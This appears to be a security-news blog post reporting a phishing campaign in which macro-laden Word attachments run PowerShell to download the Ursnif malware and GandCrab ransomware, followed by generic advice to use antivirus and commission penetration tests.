A clever phishing campaign that leverages Word attachments spreads two nasty cyberthreats the Gandcrab ransomware and Ursnif executable.
For those who don’t know GandCrab ransomware has been already spotted in several campaigns over the past year, including hidden on legitimate but compromised websites and infecting victims via a December sextortion campaign.
The Ursnif executable meanwhile is a serious threat that performs an array of malicious activities like credential harvesting, gathering system and process information, and deploying additional malware samples.
The malicious Word attachments use embedded macros to infect the targeted systems with malware and ransomware.
This new cyber attack uses a combination that first harvests credentials, system and process information, and then encrypts sensible data.
The cyber attack gets infections via phishing emails that are containing a Word document with embedded macros.
The malicious macros are used to call an encoded PowerShell script that will download and execute both Ursnif malware and GandCrab ransomware.
Cybersecurity experts say that the campaign is still active and uses or it will use some other threats because additional payloads are being posted on pastebin.com.
Remember everything can be hacked. In order to stay away from any threats related to the cyber world, we recommend the install of antivirus for Windows or antivirus for Mac on every device that you own, depending on which OS your device is running. If you are a company, it is also recommended to hire every year a specialized cybersecurity company that will run annual tests on your company’s network. These tests include penetration testing and ethical hacking tests;
Cyberattack modus operandi
At first, the initial phishing emails deliver a Microsoft Word document that is used to deploy the early stages of the attack.
These infected documents contained a VBS macro that, once activated, runs a total of 650 lines of code from which 18 lines of code are relevant the others are just for decoy.
The 18 lines PowerShell script then downloads and executes two malware from a hard-coded command-and-control address: the GandCrab ransomware and the Ursnif malware.
For now, no additional data is available regarding the number of victims but there have been spotted a total of 180 Word document variants in this malicious campaign that are seriously rising the chances of high infection rates. These variants were presumably created in batches that were then sent to a big number of potential victims.
We would continue to monitor this cybersecurity problem. Meanwhile, users should keep a keen eye out for any cyber attacks. Remember to use an antivirus for Windows or antivirus for Mac in every device that you own, depending on which OS your machine is running, If you are a company we recommend to hire every year a specialized cybersecurity company that will run annual tests on your company’s network, tests like this include: penetration testing and ethical hacking.